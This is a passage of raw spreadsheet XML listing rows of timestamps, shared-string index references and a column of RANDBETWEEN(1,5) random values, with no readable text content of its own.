        <v>1</v>
      </c>
    </row>
    <row r="12764" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A12764" s="1">
        <v>43290.659930555557</v>
      </c>
      <c r="C12764" t="s">
        <v>156</v>
      </c>
      <c r="D12764" t="s">
        <v>41</v>
      </c>
      <c r="E12764" s="2" t="s">
        <v>11438</v>
      </c>
      <c r="F12764">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12765" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12765" s="1">
        <v>43290.624791666669</v>
      </c>
      <c r="C12765" t="s">
        <v>10</v>
      </c>
      <c r="D12765" t="s">
        <v>20</v>
      </c>
      <c r="E12765" s="2" t="s">
        <v>11439</v>
      </c>
      <c r="F12765">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12766" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12766" s="1">
        <v>43290.618206018517</v>
      </c>
      <c r="C12766" t="s">
        <v>10</v>
      </c>
      <c r="D12766" t="s">
        <v>52</v>
      </c>
      <c r="E12766" t="s">
        <v>11440</v>
      </c>
      <c r="F12766">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12767" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12767" s="1">
        <v>43290.605428240742</v>
      </c>
      <c r="C12767" t="s">
        <v>222</v>
      </c>
      <c r="D12767" t="s">
        <v>194</v>
      </c>
      <c r="E12767" s="2" t="s">
        <v>11441</v>
      </c>
      <c r="F12767">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12768" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12768" s="1">
        <v>43290.604212962964</v>
      </c>
      <c r="C12768" t="s">
        <v>10</v>
      </c>
      <c r="D12768" t="s">
        <v>178</v>
      </c>
      <c r="E12768" t="s">
        <v>11442</v>
      </c>
      <c r="F12768">
        <f t="shared" ca="1" si="199"/>
        <v>1</v>
      </c>
    </row>
    <row r="12769" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12769" s="1">
        <v>43290.59710648148</v>
      </c>
      <c r="C12769" t="s">
        <v>48</v>
      </c>
      <c r="E12769" t="s">
        <v>11443</v>
      </c>
      <c r="F12769">
        <f t="shared" ca="1" si="199"/>
        <v>2</v>
      </c>
    </row>
    <row r="12770" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A12770" s="1">
        <v>43290.588333333333</v>
      </c>
      <c r="C12770" t="s">
        <v>10</v>
      </c>
      <c r="D12770" t="s">
        <v>14</v>
      </c>
      <c r="E12770" s="2" t="s">
        <v>11444</v>
      </c>
      <c r="F12770">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12771" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A12771" s="1">
        <v>43290.58185185185</v>
      </c>
      <c r="C12771" t="s">
        <v>156</v>
      </c>
      <c r="D12771" t="s">
        <v>602</v>
      </c>
      <c r="E12771" s="2" t="s">
        <v>11445</v>
      </c>
      <c r="F12771">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12772" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A12772" s="1">
        <v>43290.54078703704</v>
      </c>
      <c r="C12772" t="s">
        <v>226</v>
      </c>
      <c r="D12772" t="s">
        <v>20</v>
      </c>
      <c r="E12772" s="2" t="s">
        <v>11446</v>
      </c>
      <c r="F12772">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12773" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12773" s="1">
        <v>43290.531736111108</v>
      </c>
      <c r="C12773" t="s">
        <v>10</v>
      </c>
      <c r="D12773" t="s">
        <v>6</v>
      </c>
      <c r="E12773" t="s">
        <v>11447</v>
      </c>
      <c r="F12773">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12774" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12774" s="1">
        <v>43290.510601851849</v>
      </c>
      <c r="C12774" t="s">
        <v>43</v>
      </c>
      <c r="E12774" s="2" t="s">
        <v>11448</v>
      </c>
      <c r="F12774">
        <f t="shared" ca="1" si="199"/>
        <v>1</v>
      </c>
    </row>
    <row r="12775" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12775" s="1">
        <v>43290.480555555558</v>
      </c>
      <c r="C12775" t="s">
        <v>10</v>
      </c>
      <c r="D12775" t="s">
        <v>56</v>
      </c>
      <c r="E12775" t="s">
        <v>11449</v>
      </c>
      <c r="F12775">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12776" s="1">
        <v>43290.476365740738</v>
      </c>
      <c r="C12776" t="s">
        <v>10</v>
      </c>
      <c r="D12776" t="s">
        <v>667</v>
      </c>
      <c r="E12776" t="s">
        <v>11450</v>
      </c>
      <c r="F12776">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12777" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12777" s="1">
        <v>43290.439409722225</v>
      </c>
      <c r="C12777" t="s">
        <v>10</v>
      </c>
      <c r="D12777" t="s">
        <v>89</v>
      </c>
      <c r="E12777" t="s">
        <v>11451</v>
      </c>
      <c r="F12777">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12778" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12778" s="1">
        <v>43290.431701388887</v>
      </c>
      <c r="C12778" t="s">
        <v>8808</v>
      </c>
      <c r="D12778" t="s">
        <v>1993</v>
      </c>
      <c r="E12778" s="2" t="s">
        <v>11452</v>
      </c>
      <c r="F12778">
        <f t="shared" ca="1" si="199"/>
        <v>1</v>
      </c>
    </row>
    <row r="12779" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12779" s="1">
        <v>43290.430532407408</v>
      </c>
      <c r="C12779" t="s">
        <v>6</v>
      </c>
      <c r="D12779" t="s">
        <v>25</v>
      </c>
      <c r="E12779" t="s">
        <v>11453</v>
      </c>
      <c r="F12779">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12780" s="1">
        <v>43290.42864583333</v>
      </c>
      <c r="C12780" t="s">
        <v>10</v>
      </c>
      <c r="D12780" t="s">
        <v>20</v>
      </c>
      <c r="E12780" t="s">
        <v>11454</v>
      </c>
      <c r="F12780">
        <f t="shared" ca="1" si="199"/>
        <v>2</v>
      </c>
    </row>
    <row r="12781" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12781" s="1">
        <v>43290.413599537038</v>
      </c>
      <c r="C12781" t="s">
        <v>253</v>
      </c>
      <c r="E12781" s="2" t="s">
        <v>11455</v>
      </c>
      <c r="F12781">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12782" s="1">
        <v>43290.41101851852</v>
      </c>
      <c r="C12782" t="s">
        <v>6</v>
      </c>
      <c r="D12782" t="s">
        <v>25</v>
      </c>
      <c r="E12782" t="s">
        <v>11456</v>
      </c>
      <c r="F12782">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12783" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12783" s="1">
        <v>43290.389004629629</v>
      </c>
      <c r="C12783" t="s">
        <v>48</v>
      </c>
      <c r="E12783" s="2" t="s">
        <v>11457</v>
      </c>
      <c r="F12783">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12784" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12784" s="1">
        <v>43290.388344907406</v>
      </c>
      <c r="C12784" t="s">
        <v>41</v>
      </c>
      <c r="E12784" s="2" t="s">
        <v>11458</v>
      </c>
      <c r="F12784">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12785" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12785" s="1">
        <v>43290.385659722226</v>
      </c>
      <c r="C12785" t="s">
        <v>124</v>
      </c>
      <c r="E12785" s="2" t="s">
        <v>11459</v>
      </c>
      <c r="F12785">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12786" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12786" s="1">
        <v>43290.364224537036</v>
      </c>
      <c r="C12786" t="s">
        <v>10</v>
      </c>
      <c r="D12786" t="s">
        <v>36</v>
      </c>
      <c r="E12786" s="2" t="s">
        <v>11460</v>
      </c>
      <c r="F12786">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12787" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12787" s="1">
        <v>43290.343009259261</v>
      </c>
      <c r="C12787" t="s">
        <v>222</v>
      </c>
      <c r="D12787" t="s">
        <v>290</v>
      </c>
      <c r="E12787" s="2" t="s">
        <v>11461</v>
      </c>
      <c r="F12787">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12788" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12788" s="1">
        <v>43290.314710648148</v>
      </c>
      <c r="C12788" t="s">
        <v>60</v>
      </c>
      <c r="E12788" t="s">
        <v>11462</v>
      </c>
      <c r="F12788">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12789" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12789" s="1">
        <v>43290.31354166667</v>
      </c>
      <c r="C12789" t="s">
        <v>319</v>
      </c>
      <c r="D12789" t="s">
        <v>11463</v>
      </c>
      <c r="E12789" s="2" t="s">
        <v>11464</v>
      </c>
      <c r="F12789">
        <f t="shared" ca="1" si="199"/>
        <v>1</v>
      </c>
    </row>
    <row r="12790" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12790" s="1">
        <v>43290.27715277778</v>
      </c>
      <c r="C12790" t="s">
        <v>841</v>
      </c>
      <c r="E12790" s="2" t="s">
        <v>11465</v>
      </c>
      <c r="F12790">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12791" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12791" s="1">
        <v>43290.26935185185</v>
      </c>
      <c r="C12791" t="s">
        <v>10</v>
      </c>
      <c r="D12791" t="s">
        <v>52</v>
      </c>
      <c r="E12791" s="2" t="s">
        <v>11466</v>
      </c>
      <c r="F12791">
        <f t="shared" ca="1" si="199"/>
        <v>1</v>
      </c>
    </row>
    <row r="12792" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12792" s="1">
        <v>43290.25953703704</v>
      </c>
      <c r="C12792" t="s">
        <v>222</v>
      </c>
      <c r="D12792" t="s">
        <v>602</v>
      </c>
      <c r="E12792" s="2" t="s">
        <v>11467</v>
      </c>
      <c r="F12792">
        <f t="shared" ca="1" si="199"/>
        <v>1</v>
      </c>
    </row>
    <row r="12793" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12793" s="1">
        <v>43290.258217592593</v>
      </c>
      <c r="C12793" t="s">
        <v>41</v>
      </c>
      <c r="E12793" s="2" t="s">
        <v>11468</v>
      </c>
      <c r="F12793">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12794" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A12794" s="1">
        <v>43290.256874999999</v>
      </c>
      <c r="C12794" t="s">
        <v>71</v>
      </c>
      <c r="E12794" s="2" t="s">
        <v>11469</v>
      </c>
      <c r="F12794">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12795" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12795" s="1">
        <v>43290.248668981483</v>
      </c>
      <c r="C12795" t="s">
        <v>118</v>
      </c>
      <c r="E12795" s="2" t="s">
        <v>11470</v>
      </c>
      <c r="F12795">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12796" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12796" s="1">
        <v>43290.244618055556</v>
      </c>
      <c r="C12796" t="s">
        <v>8808</v>
      </c>
      <c r="D12796" t="s">
        <v>80</v>
      </c>
      <c r="E12796" s="2" t="s">
        <v>11471</v>
      </c>
      <c r="F12796">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12797" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A12797" s="1">
        <v>43290.232743055552</v>
      </c>
      <c r="C12797" t="s">
        <v>41</v>
      </c>
      <c r="E12797" s="2" t="s">
        <v>11472</v>
      </c>
      <c r="F12797">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12798" s="1">
        <v>43290.214513888888</v>
      </c>
      <c r="C12798" t="s">
        <v>73</v>
      </c>
      <c r="E12798" t="s">
        <v>11473</v>
      </c>
      <c r="F12798">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12799" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12799" s="1">
        <v>43290.199826388889</v>
      </c>
      <c r="C12799" t="s">
        <v>2192</v>
      </c>
      <c r="D12799" t="s">
        <v>7</v>
      </c>
      <c r="E12799" s="2" t="s">
        <v>11474</v>
      </c>
      <c r="F12799">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12800" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12800" s="1">
        <v>43290.198564814818</v>
      </c>
      <c r="C12800" t="s">
        <v>71</v>
      </c>
      <c r="E12800" t="s">
        <v>11475</v>
      </c>
      <c r="F12800">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12801" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12801" s="1">
        <v>43290.192106481481</v>
      </c>
      <c r="C12801" t="s">
        <v>71</v>
      </c>
      <c r="E12801" s="2" t="s">
        <v>11476</v>
      </c>
      <c r="F12801">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12802" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A12802" s="1">
        <v>43290.159259259257</v>
      </c>
      <c r="C12802" t="s">
        <v>454</v>
      </c>
      <c r="D12802" t="s">
        <v>290</v>
      </c>
      <c r="E12802" s="2" t="s">
        <v>11477</v>
      </c>
      <c r="F12802">
        <f t="shared" ref="F12802:F12865" ca="1" si="200">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="12803" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12803" s="1">
        <v>43290.084166666667</v>
      </c>
      <c r="C12803" t="s">
        <v>139</v>
      </c>
      <c r="D12803" t="s">
        <v>263</v>
      </c>
      <c r="E12803" s="2" t="s">
        <v>11478</v>
      </c>
      <c r="F12803">
        <f t="shared" ca="1" si="200"/>
        <v>5</v>
      </c>
    </row>
    <row r="12804" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12804" s="1">
        <v>43289.998263888891</v>
      </c>
      <c r="C12804" t="s">
        <v>1377</v>
      </c>
      <c r="D12804" t="s">
        <v>89</v>
      </c>
      <c r="E12804" s="2" t="s">
        <v>11479</v>
      </c>
      <c r="F12804">
        <f t="shared" ca="1" si="200"/>
        <v>1</v>
      </c>
    </row>
    <row r="12805" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A12805" s="1">
        <v>43289.957615740743</v>
      </c>
      <c r="C12805" t="s">
        <v>156</v>
      </c>
      <c r="D12805" t="s">
        <v>23</v>
      </c>
      <c r="E12805" s="2" t="s">
        <v>11480</v>
      </c>
      <c r="F12805">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12806" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12806" s="1">
        <v>43289.912986111114</v>
      </c>
      <c r="C12806" t="s">
        <v>1377</v>
      </c>
      <c r="D12806" t="s">
        <v>92</v>
      </c>
      <c r="E12806" s="2" t="s">
        <v>11481</v>
      </c>
      <c r="F12806">
        <f t="shared" ca="1" si="200"/>
        <v>2</v>
      </c>
    </row>
    <row r="12807" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12807" s="1">
        <v>43289.881527777776</v>
      </c>
      <c r="C12807" t="s">
        <v>319</v>
      </c>
      <c r="D12807" t="s">
        <v>320</v>
      </c>
      <c r="E12807" s="2" t="s">
        <v>11482</v>
      </c>
      <c r="F12807">
        <f t="shared" ca="1" si="200"/>
        <v>2</v>
      </c>
    </row>
    <row r="12808" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12808" s="1">
        <v>43289.880300925928</v>
      </c>
      <c r="C12808" t="s">
        <v>1377</v>
      </c>
      <c r="D12808" t="s">
        <v>36</v>
      </c>
      <c r="E12808" s="2" t="s">
        <v>11483</v>
      </c>
      <c r="F12808">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12809" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12809" s="1">
        <v>43289.707372685189</v>
      </c>
      <c r="C12809" t="s">
        <v>318</v>
      </c>
      <c r="D12809" t="s">
        <v>885</v>
      </c>
      <c r="E12809" s="2" t="s">
        <v>11484</v>
      </c>
      <c r="F12809">
        <f t="shared" ca="1" si="200"/>
        <v>5</v>
      </c>
    </row>
    <row r="12810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12810" s="1">
        <v>43289.653958333336</v>
      </c>
      <c r="C12810" t="s">
        <v>41</v>
      </c>
      <c r="E12810" t="s">
        <v>11485</v>
      </c>
      <c r="F12810">
        <f t="shared" ca="1" si="200"/>
        <v>1</v>
      </c>
    </row>
    <row r="12811" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12811" s="1">
        <v>43289.637013888889</v>
      </c>
      <c r="C12811" t="s">
        <v>3049</v>
      </c>
      <c r="E12811" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F12811">
        <f t="shared" ca="1" si="200"/>
        <v>2</v>
      </c>
    </row>
    <row r="12812" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12812" s="1">
        <v>43289.578379629631</v>
      </c>
      <c r="C12812" t="s">
        <v>3049</v>
      </c>
      <c r="E12812" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F12812">
        <f t="shared" ca="1" si="200"/>
        <v>1</v>
      </c>
    </row>
    <row r="12813" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12813" s="1">
        <v>43289.500925925924</v>
      </c>
      <c r="C12813" t="s">
        <v>41</v>
      </c>
      <c r="E12813" s="2" t="s">
        <v>11486</v>
      </c>
      <c r="F12813">
        <f t="shared" ca="1" si="200"/>
        <v>2</v>
      </c>
    </row>
    <row r="12814" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12814" s="1">
        <v>43289.495625000003</v>
      </c>
      <c r="C12814" t="s">
        <v>41</v>
      </c>
      <c r="E12814" s="2" t="s">
        <v>11487</v>
      </c>
      <c r="F12814">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12815" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12815" s="1">
        <v>43289.3983912037</v>
      </c>
      <c r="C12815" t="s">
        <v>63</v>
      </c>
      <c r="E12815" s="2" t="s">
        <v>11488</v>
      </c>
      <c r="F12815">
        <f t="shared" ca="1" si="200"/>
        <v>2</v>
      </c>
    </row>
    <row r="12816" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12816" s="1">
        <v>43289.381284722222</v>
      </c>
      <c r="C12816" t="s">
        <v>63</v>
      </c>
      <c r="E12816" s="2" t="s">
        <v>11489</v>
      </c>
      <c r="F12816">
        <f t="shared" ca="1" si="200"/>
        <v>1</v>
      </c>
    </row>
    <row r="12817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12817" s="1">
        <v>43289.289479166669</v>
      </c>
      <c r="C12817" t="s">
        <v>2210</v>
      </c>
      <c r="D12817" t="s">
        <v>25</v>
      </c>
      <c r="E12817" t="s">
        <v>11490</v>
      </c>
      <c r="F12817">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12818" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12818" s="1">
        <v>43289.213391203702</v>
      </c>
      <c r="C12818" t="s">
        <v>41</v>
      </c>
      <c r="E12818" s="2" t="s">
        <v>11491</v>
      </c>
      <c r="F12818">
        <f t="shared" ca="1" si="200"/>
        <v>1</v>
      </c>
    </row>
    <row r="12819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12819" s="1">
        <v>43289.130844907406</v>
      </c>
      <c r="C12819" t="s">
        <v>2210</v>
      </c>
      <c r="D12819" t="s">
        <v>39</v>
      </c>
      <c r="E12819" t="s">
        <v>11492</v>
      </c>
      <c r="F12819">
        <f t="shared" ca="1" si="200"/>
        <v>4</v>
      </c>
    </row>
    <row r="12820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12820" s="1">
        <v>43289.102800925924</v>
      </c>
      <c r="C12820" t="s">
        <v>41</v>
      </c>
      <c r="E12820">
        <v>9783857871</v>
      </c>
      <c r="F12820">
        <f t="shared" ca="1" si="200"/>
        <v>4</v>
      </c>
    </row>
    <row r="12821" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12821" s="1">
        <v>43288.69431712963</v>
      </c>
      <c r="C12821" t="s">
        <v>229</v>
      </c>
      <c r="D12821" t="s">
        <v>11</v>
      </c>
      <c r="E12821" s="2" t="s">
        <v>11493</v>
      </c>
      <c r="F12821">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12822" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12822" s="1">
        <v>43288.654675925929</v>
      </c>
      <c r="C12822" t="s">
        <v>124</v>
      </c>
      <c r="E12822" t="s">
        <v>11494</v>
      </c>
      <c r="F12822">
        <f t="shared" ca="1" si="200"/>
        <v>1</v>
      </c>
    </row>
    <row r="12823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12823" s="1">
        <v>43288.609120370369</v>
      </c>
      <c r="C12823" t="s">
        <v>10</v>
      </c>
      <c r="D12823" t="s">
        <v>632</v>
      </c>
      <c r="E12823" t="s">
        <v>11495</v>
      </c>
      <c r="F12823">
        <f t="shared" ca="1" si="200"/>
        <v>4</v>
      </c>
    </row>
    <row r="12824" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12824" s="1">
        <v>43288.54760416667</v>
      </c>
      <c r="C12824" t="s">
        <v>10</v>
      </c>
      <c r="D12824" t="s">
        <v>667</v>
      </c>
      <c r="E12824" s="2" t="s">
        <v>11496</v>
      </c>
      <c r="F12824">
        <f t="shared" ca="1" si="200"/>
        <v>5</v>
      </c>
    </row>
    <row r="12825" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A12825" s="1">
        <v>43288.487129629626</v>
      </c>
      <c r="C12825" t="s">
        <v>139</v>
      </c>
      <c r="D12825" t="s">
        <v>263</v>
      </c>
      <c r="E12825" s="2" t="s">
        <v>11497</v>
      </c>
      <c r="F12825">
        <f t="shared" ca="1" si="200"/>
        <v>1</v>
      </c>
    </row>
    <row r="12826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12826" s="1">
        <v>43288.394270833334</v>
      </c>
      <c r="C12826" t="s">
        <v>10</v>
      </c>
      <c r="D12826" t="s">
        <v>17</v>
      </c>
      <c r="E12826" t="s">
        <v>11498</v>
      </c>
      <c r="F12826">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12827" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A12827" s="1">
        <v>43288.371111111112</v>
      </c>
      <c r="C12827" t="s">
        <v>139</v>
      </c>
      <c r="D12827" t="s">
        <v>192</v>
      </c>
      <c r="E12827" s="2" t="s">
        <v>11499</v>
      </c>
      <c r="F12827">
        <f t="shared" ca="1" si="200"/>
        <v>5</v>
      </c>
    </row>
    <row r="12828" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12828" s="1">
        <v>43288.29923611111</v>
      </c>
      <c r="C12828" t="s">
        <v>10</v>
      </c>
      <c r="D12828" t="s">
        <v>336</v>
      </c>
      <c r="E12828" s="2" t="s">
        <v>11500</v>
      </c>
      <c r="F12828">
        <f t="shared" ca="1" si="200"/>
        <v>2</v>
      </c>
    </row>
    <row r="12829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12829" s="1">
        <v>43288.285694444443</v>
      </c>
      <c r="C12829" t="s">
        <v>2210</v>
      </c>
      <c r="D12829" t="s">
        <v>36</v>
      </c>
      <c r="E12829" t="s">
        <v>11501</v>
      </c>
      <c r="F12829">
        <f t="shared" ca="1" si="200"/>
        <v>5</v>
      </c>
    </row>
    <row r="12830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12830" s="1">
        <v>43288.187754629631</v>
      </c>
      <c r="C12830" t="s">
        <v>454</v>
      </c>
      <c r="D12830" t="s">
        <v>244</v>
      </c>
      <c r="E12830" t="s">
        <v>11502</v>
      </c>
      <c r="F12830">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12831" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A12831" s="1">
        <v>43288.179351851853</v>
      </c>
      <c r="C12831" t="s">
        <v>10</v>
      </c>
      <c r="D12831" t="s">
        <v>271</v>
      </c>
      <c r="E12831" s="2" t="s">
        <v>11503</v>
      </c>
      <c r="F12831">
        <f t="shared" ca="1" si="200"/>
        <v>5</v>
      </c>
    </row>
    <row r="12832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12832" s="1">
        <v>43287.977280092593</v>
      </c>
      <c r="C12832" t="s">
        <v>1179</v>
      </c>
      <c r="D12832" t="s">
        <v>52</v>
      </c>
      <c r="E12832" t="s">
        <v>11504</v>
      </c>
      <c r="F12832">
        <f t="shared" ca="1" si="200"/>
        <v>5</v>
      </c>
    </row>
    <row r="12833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12833" s="1">
        <v>43287.700729166667</v>
      </c>
      <c r="C12833" t="s">
        <v>10</v>
      </c>
      <c r="D12833" t="s">
        <v>6</v>
      </c>
      <c r="E12833" t="s">
        <v>11505</v>
      </c>
      <c r="F12833">
        <f t="shared" ca="1" si="200"/>
        <v>5</v>
      </c>
    </row>
    <row r="12834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12834" s="1">
        <v>43287.699189814812</v>
      </c>
      <c r="C12834" t="s">
        <v>461</v>
      </c>
      <c r="D12834" t="s">
        <v>17</v>
      </c>
      <c r="E12834" t="s">
        <v>11506</v>
      </c>
      <c r="F12834">
        <f t="shared" ca="1" si="200"/>
        <v>2</v>
      </c>
    </row>
    <row r="12835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12835" s="1">
        <v>43287.689814814818</v>
      </c>
      <c r="C12835" t="s">
        <v>63</v>
      </c>
      <c r="F12835">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12836" s="1">
        <v>43287.688738425924</v>
      </c>
      <c r="C12836" t="s">
        <v>6</v>
      </c>
      <c r="D12836" t="s">
        <v>25</v>
      </c>
      <c r="E12836" t="s">
        <v>1920</v>
      </c>
      <c r="F12836">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12837" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12837" s="1">
        <v>43287.688078703701</v>
      </c>
      <c r="C12837" t="s">
        <v>6</v>
      </c>
      <c r="D12837" t="s">
        <v>194</v>
      </c>
      <c r="E12837" s="2" t="s">
        <v>11507</v>
      </c>
      <c r="F12837">
        <f t="shared" ca="1" si="200"/>
        <v>2</v>
      </c>
    </row>
    <row r="12838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12838" s="1">
        <v>43287.670648148145</v>
      </c>
      <c r="C12838" t="s">
        <v>10</v>
      </c>
      <c r="D12838" t="s">
        <v>86</v>
      </c>
      <c r="E12838" t="s">
        <v>11508</v>
      </c>
      <c r="F12838">
        <f t="shared" ca="1" si="200"/>
        <v>3</v>
      </c>
    </row>
    <row r="12839" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12839" s="1">
        <v>43287.668275462966</v>
      </c>
      <c r="C12839" t="s">
        <v>260</v>
      </c>
      <c r="E12839" s="2" t="s">
        <v>11509</v>
      </c>
      <c r="F12839">
        <f t="shared" ca="1" si="200"/>
        <v>2</v>
      </c>
    </row>
    <row r="12840" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12840" s="1">
        <v>43287.658842592595</v>
      </c>
      <c r="C12840" t="s">
        <v>10</v>
      </c>
      <c r="D12840" t="s">
        <v>89</v>
      </c>
      <c r="E12840" s="2" t="s">
        <v>11510</v>
      </c>
